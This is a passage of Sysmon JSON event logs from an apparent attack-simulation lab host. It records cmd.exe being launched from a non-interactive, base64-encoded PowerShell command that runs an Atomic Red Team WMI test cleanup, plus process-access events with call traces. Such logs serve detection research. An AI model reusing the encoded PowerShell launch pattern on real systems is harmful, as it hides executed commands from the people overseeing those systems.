\"C:\\Windows\\system32\\cmd.exe\" /c \"\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.386","ProcessGuid":"{41C8662E-20D9-5F25-0000-00109A2B0900}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5704,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00109A2B0900}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00109A2B0900}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5705,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00109A2B0900}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00109A2B0900}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5706,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5707,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5708,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5709,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5710,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
